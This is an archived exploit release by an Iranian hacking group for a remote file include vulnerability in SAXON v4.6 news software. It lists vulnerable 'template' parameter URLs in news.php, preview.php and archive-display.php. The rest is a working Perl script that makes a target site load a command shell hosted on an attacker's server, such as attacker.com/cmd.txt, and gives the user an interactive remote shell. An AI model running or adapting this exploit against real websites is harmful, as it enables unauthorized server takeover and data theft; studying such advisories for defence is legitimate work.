TUCoPS :: HP Unsorted S

TUCoPS :: HP Unsorted S :: tb10978.htm
Simple Accessible XHTML Online News v4.6 Remote File Include Exploit
Simple Accessible XHTML Online News v4.6 Remote File Include Exploit Simple Accessible XHTML Online News v4.6 Remote File Include Exploit

 """""""""""""""""""""""""""""""""""""""""""""""
 """  ::     ::                :::::   ::::  """
 """   ::   ::                 ::  :   ::    """
 """     ::::    ::   :: ::::: :::::   ::::  """
 """    ::  ::   ::: ::: :: :: ::  ::    ::  """
 """  ::      :: :: :  : ::::: ::   :: ::::  """
 """                                         """
 """""""""""""""""""""""""""""""""""""""""""""""
    Xmor$ Security Vulnerability Research TM

# Tilte: SAXON : Simple Accessible XHTML Online News v4.6 Remote File Include Exploit

# Author..................: [the_Edit0r]
# Location ...............: [Iran]
# Homepage ...............: [Www.XmorS-sEcurity.coM] 
[Www.XmorS.coM] [Www.XmorS.neT] 
# Software ...............: [SAXON] 
# Impact..................: [Remote]
# Advisory ...............: [Www.XmorS-sEurity.coM/advisory/SAXON(rfi).txt] 
# Site Script ............: [http://www.blackwidows.co.uk] 
# We ArE .................: [Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T,DarkAngel]
# SP tnx .................: [www.bugtraq.ir] & [Iranian Hackers TeaM] 
# Vulnerabilities ........: 

www.example.com/[path]/news.php?template=[Shell-Script] 
www.example.com/[path]/preview.php?template=[Shell-Script] 
www.example.com/[path]/archive-display.php?template=[Shell-Script] 

-------------------------------- Exploit --------------------------------------------

#!/usr/bin/perl

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}

head();

while()
{
       print "[shell] \$";
while()
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.'news.php?template='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[....]/;

if (!$cmd) {print "\nWellcome Command !\n\n"; $return ="";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in /)
       {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit}
elsif ($return =~/^.Fatal.error/) {print "\nInvalid Command or No Return\n\n"}

if($return =~ /(.*)/)


{
       $finreturn = $1;
       $finreturn=~ tr/[....]/[\n]/;
       print "\r\n$finreturn\n\r";
       last;
}

else {print "[shell] \$";}}}last;

sub head()
 {
 print " * SAXON v4.6 Remote File Include Exploit*\r\n";
 }
sub usage()
 {
 head();
 print " Usage: Xpl.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";
print "  - Full path to SAXON ex: http://www.site.com/ \r\n"; 
print "  - Path to cmd Shell e.g http://www.attacker.com/cmd.txt \r\n"; 
 print "  - Command variable used in php shell \r\n";
 print "...............................................................\n";
 print ".                                                             .\n";
 print ".        SAXON remote Command Execution Vulnerabilities       .\n";
 print ".                                                             .\n";
 print "...............................................................\n";
 print ".                                                             .\n";
 print ".         Xmor$ Security Vulnerability Research TM            .\n";
 print ".                                                             .\n";
 print "...............................................................\n\n";
 exit();
 }

--------------------------------- End Codes ------------------------------------------


# Contact me : the_3dit0r[at]Yahoo[dot]coM

# [XmorS-SEcurity.coM]